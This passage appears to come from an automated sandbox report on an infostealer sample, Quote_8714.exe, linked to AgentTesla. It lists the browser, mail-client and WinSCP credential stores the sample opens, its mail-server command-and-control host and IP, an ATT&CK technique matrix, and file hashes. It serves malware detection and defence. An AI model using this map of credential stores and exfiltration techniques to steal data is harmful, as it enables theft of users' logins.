                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Users\user\Desktop\Quote_8714.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.Quote_8714.exe.3a82990.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote_8714.exe.3a59970.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.Quote_8714.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote_8714.exe.3a82990.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.2940203488.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Quote_8714.exe PID: 7392, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Quote_8714.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Quote_8714.exe PID: 7392, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.Quote_8714.exe.3a82990.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote_8714.exe.3a59970.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.Quote_8714.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote_8714.exe.3a82990.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.2940203488.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Quote_8714.exe PID: 7392, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        111
                        Process Injection
                        1
                        Masquerading
                        2
                        OS Credential Dumping
                        111
                        Security Software Discovery
                        Remote Services1
                        Email Collection
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        1
                        Credentials in Registry
                        1
                        Process Discovery
                        Remote Desktop Protocol11
                        Archive Collected Data
                        1
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                        Virtualization/Sandbox Evasion
                        Security Account Manager141
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin Shares2
                        Data from Local System
                        1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput Capture11
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information
                        LSA Secrets1
                        File and Directory Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information
                        Cached Domain Credentials24
                        System Information Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Software Packing
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Quote_8714.exe37%ReversingLabsByteCode-MSIL.Infostealer.Pony
                        Quote_8714.exe48%VirustotalBrowse
                        Quote_8714.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mail.mbarieservicesltd.com
                        199.79.62.115
                        truefalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.comQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers?Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.tiro.comQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.krQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.carterandcone.comlQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.sajatypeworks.comQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.typography.netDQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designers/cabarga.htmlNQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/cTheQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/staff/dennis.htmQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cnQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.fontbureau.com/designers/frere-user.htmlQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.galapagosdesign.com/DPleaseQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.fontbureau.com/designers8Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.fonts.comQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.krQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.urwpp.deDPleaseQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.zhongyicts.com.cnQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.sakkal.comQuote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://mail.mbarieservicesltd.comQuote_8714.exe, 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                199.79.62.115
                                                                                mail.mbarieservicesltd.comUnited States
                                                                                394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1571202
                                                                                Start date and time:2024-12-09 06:51:11 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 6m 28s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:10
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:Quote_8714.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/6@3/1
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 98%
                                                                                • Number of executed functions: 136
                                                                                • Number of non-executed functions: 10
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                TimeTypeDescription
                                                                                00:52:05API Interceptor66x Sleep call for process: Quote_8714.exe modified
                                                                                00:52:07API Interceptor17x Sleep call for process: powershell.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                199.79.62.115PO82200487.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  ORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                              Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    mail.mbarieservicesltd.comPO82200487.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    ORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • 199.79.62.115
                                                                                                    Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                    • 199.79.62.115
                                                                                                    Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                    • 199.79.62.115
                                                                                                    Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    PUBLIC-DOMAIN-REGISTRYUSS1a5ZF3ytp.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 103.53.42.63
                                                                                                    List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 103.53.42.63
                                                                                                    List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 103.53.42.63
                                                                                                    h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                                                                                                    • 216.10.240.70
                                                                                                    Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 119.18.54.39
                                                                                                    m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 208.91.199.223
                                                                                                    PO82200487.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    ORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Users\user\Desktop\Quote_8714.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1216
                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                    Malicious:true
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2232
                                                                                                    Entropy (8bit):5.380805901110357
                                                                                                    Encrypted:false
